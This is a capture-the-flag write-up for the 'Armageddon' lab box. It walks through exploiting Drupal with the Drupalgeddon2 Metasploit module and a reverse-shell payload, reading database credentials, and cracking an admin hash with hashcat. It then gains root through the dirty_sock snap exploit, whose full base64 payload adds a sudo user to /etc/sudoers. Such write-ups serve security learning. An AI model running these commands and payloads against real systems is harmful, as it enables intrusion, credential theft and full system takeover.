Armageddon Write-Up
Contents
Intro
Armageddon was a fun easy box. The foothold was a CVE followed by collection credentials from a backend Mysql database and cracking the hashed password. The privilege escalation was very interesting involving an exploit with Snap.
Foothold
We start with an Nmap as per usual:
[felixm@blackbear ~]$ nmap -sV -sC 10.10.10.233 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon
Nothing too surprising just a web server on port 80 and SSH on port 22. Let's take a look at the website running on port 80:
This appears to be some sort of CMS, It's not quite clear at this point though. I attempted to create an account but I was not able to, with that I began a directory brute force:
[felixm@blackbear ~]$ gobuster -u http://armageddon.htb -w Documents/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://armageddon.htb/ [+] Threads : 100 [+] Wordlist : Documents/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2021/07/04 00:38:50 Starting gobuster ===================================================== /themes (Status: 301) /modules (Status: 301) /misc (Status: 301) /scripts (Status: 301) /sites (Status: 301) /includes (Status: 301) /profiles (Status: 301) ===================================================== 2021/07/04 00:39:19 Finished =====================================================
All of the results returned HTTP 301 response codes but checking them out showed that all of these were open index's allowing me to browse the web app's files in an attempt to figure out what is was. After a few minutes of searching I came across:
http://armageddon.htb/profiles/standard/standard.info
Which after downloading and reading revealed what I was looking at:
felixm@blackbear:~/Downloads$ cat standard.info name = Standard description = Install with commonly used features pre-configured. version = VERSION core = 7.x dependencies[] = block dependencies[] = color dependencies[] = comment dependencies[] = contextual dependencies[] = dashboard dependencies[] = help dependencies[] = image dependencies[] = list dependencies[] = menu dependencies[] = number dependencies[] = options dependencies[] = path dependencies[] = taxonomy dependencies[] = dblog dependencies[] = search dependencies[] = shortcut dependencies[] = toolbar dependencies[] = overlay dependencies[] = field_ui dependencies[] = file dependencies[] = rdf ; Information added by Drupal.org packaging script on 2017-06-21 version = "7.56" project = "drupal" datestamp = "1498069849"
Looking at the bottom few lines we can see that this CMS is built using Drupal 7.56. With this I'll check for quick win CVE's especially since this is an easy box. A quick search brings up an exploit called Drupalgeddon. Drupalgeddon is an exploit for CVE-2018-7600 which abuses a lack of input sanitization in Drupal's core functionality for handling certain requests. This exploit works by sending specially crafted requests to the targeted Drupal site, which would then execute the malicious code contained in the request.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.233 yes The target host(s), range CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.18 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP In-Memory)
User
Now most of the time I'm dealing with boxes with CMS style footholds I check to see if the CMS uses a backend database and if so, if I can find clear text credentials. For me, I already knew whereabouts to look since I spent some time snooping around those open index's from earlier. Looking at /var/www/html/sites/default/settings.php we can find:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
I attempted to SSH into this user but no luck (I couldn't see if this was a valid user as the Apache user can't look into the home folder). So let's attempt to find the credentials in Mysql:
bash-4.2$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;' actions authmap batch block block_custom block_node_type block_role [...] url_alias users users_roles variable watchdog
bash-4.2$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;'
uid name pass mail [...]
0 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu [...]
Now to crack this hash, for that I'll use Hashcat so I'll pass this hash to my Windows base machine to crack:
PS C:\hashcat-6.2.1> ./hashcat.exe -m 7900 hash.txt rockyou.txt hashcat (v6.2.1) starting... ======================================================================== * Device #1: GeForce GTX 1080, 6592/8192 MB (2048 MB allocatable), 20MCU Dictionary cache built: * Filename..: rockyou.txt * Passwords.: 14344391 * Bytes.....: 139921497 * Keyspace..: 14344384 * Runtime...: 1 sec $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo Session..........: hashcat Status...........: Cracked Hash.Name........: Drupal7 Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt Time.Started.....: Tue Jul 06 22:52:09 2021 (4 secs) Time.Estimated...: Tue Jul 06 22:52:13 2021 (0 secs) Guess.Base.......: File (rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 23259 H/s (6.79ms) @ Accel:4 Loops:64 Thr:1024 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 81920/14344384 (0.57%) Rejected.........: 0/81920 (0.00%) Restore.Point....: 0/14344384 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32704-32768 Candidates.#1....: 123456 -> janmark Hardware.Mon.#1..: Temp: 64c Fan: 36% Util: 99% Core:1923MHz Mem:5005MHz Bus:16 Started: Tue Jul 06 22:51:57 2021 Stopped: Tue Jul 06 22:52:14 2021
The password found was booboo so lets try connecting through SSH using brucetherealadmin:booboo:
[felixm@blackbear ~]$ ssh brucetherealadmin@armageddon.htb brucetherealadmin@armageddon.htb's password: [brucetherealadmin@armageddon ~]$ whoami && id brucetherealadmin uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Root
We can start with the very basic sudo -l to see if we can run anything with elevated privileges:
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
Looks like we can run snap install as root. Searching around a little bit I found an exploit called dirty_sock. This exploit builds a malicious snap bundle and once installed, creates a priviledged user called dirty_sock.
Now when I tried running this automated script on the target I ran into some issues when the script attempted to make a network connection to local host so I read over the code and found I could manually execute the main functions:
First we need to create the malicious snap package with the following:
[brucetherealadmin@armageddon tmp]$ python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > exploit.snap
Then we can install this package with the following:
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode exploit.snap dirty-sock 0.1 installed
We can now swap to this user:
[brucetherealadmin@armageddon tmp]$ su dirty_sock [dirty_sock@armageddon ~]$ whoami && id dirty_sock uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Finally we can now swap to root!
[dirty_sock@armageddon ~]$ sudo -i [root@armageddon ~]# whoami && id root uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
This was a very fun box, nothing too crazy and for an easy box, still a few small challenges! Good luck you your next box!